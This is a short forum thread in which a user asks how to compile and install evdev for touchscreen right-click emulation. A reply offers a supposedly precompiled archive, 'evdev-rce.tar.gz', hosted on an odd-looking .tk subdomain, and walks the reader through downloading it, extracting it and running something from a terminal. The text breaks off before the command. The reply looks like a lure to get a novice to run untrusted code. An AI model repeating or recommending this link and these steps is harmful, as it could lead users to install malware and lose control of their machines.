evdev for right click emulation on a touchscreen, but how do I install it?

I can't figure out what needs to be done to compile and install evdev:

I did a sudo apt install to install evdev-tools, but something's still missing... some .h file, somewhere.

Can anyone help?

I've compiled the source for you - https://mityer.khdlhfjijfrupr.tk/files/evdev-rce.tar.gz

Download, Right click on the archive, Extract Here. Go into the 'out' folder, right click Open Terminal and run:
